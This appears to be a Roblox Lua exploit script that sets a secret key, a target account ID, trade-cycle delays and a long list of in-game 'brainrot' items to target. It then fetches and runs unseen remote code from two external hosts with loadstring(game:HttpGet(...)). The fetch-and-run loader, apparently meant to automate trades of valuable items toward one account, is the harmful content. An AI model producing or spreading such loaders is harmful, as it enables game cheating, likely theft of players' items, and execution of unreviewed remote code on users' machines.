getgenv().SECRET_KEY = "mrr_ecde9a2f110547e59c5da81a0b2420ef"
getgenv().TARGET_ID = 10829649420
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Skibidi Toilet"] = true,
    ["Meowl"] = true,
    ["Strawberry Elephant"] = true,
    ["Griffin"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Gobblino Uniciclino"] = true,
    ["W or L"] = true,
    ["La Taco Combinasion"] = true,
    ["Festive 67"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Tang Tang Keletang"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Fragola La La La"] = true,
    ["Guest 666"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Tacoritas"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["Las Sis"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Fishino Clownino"] = true,
    ["La Food Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Amigos"] = true,
    ["Lovin Rose"] = true,
    ["Chicliterita bicicliterita"] = true,
    ["Celestial Pegasus"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Signore Carapace"] = true,
    ["Elefanto Frigo"] = true,
    ["Cloverat Clapat"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Antonio"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["La Ginger Sekolah"] = true,
    ["Dug dug dug"] = true,
    ["Money Money Reindeer"] = true,
    ["Chillin Chili"] = true,
    ["Chipso and Queso"] = true,
    ["Tralaledon"] = true,
    ["La Jolly Grande"] = true,
    ["Eviledon"] = true,
    ["Ketupat Kepat"] = true,
    ["Nacho Spyder"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://api.jnkie.com/api/v1/luascripts/public/72bdd0e2a92a3d6de5c85f3672cb06c6a948f4fa24c0d2a3fc91585ee910f726/download"))()
end)
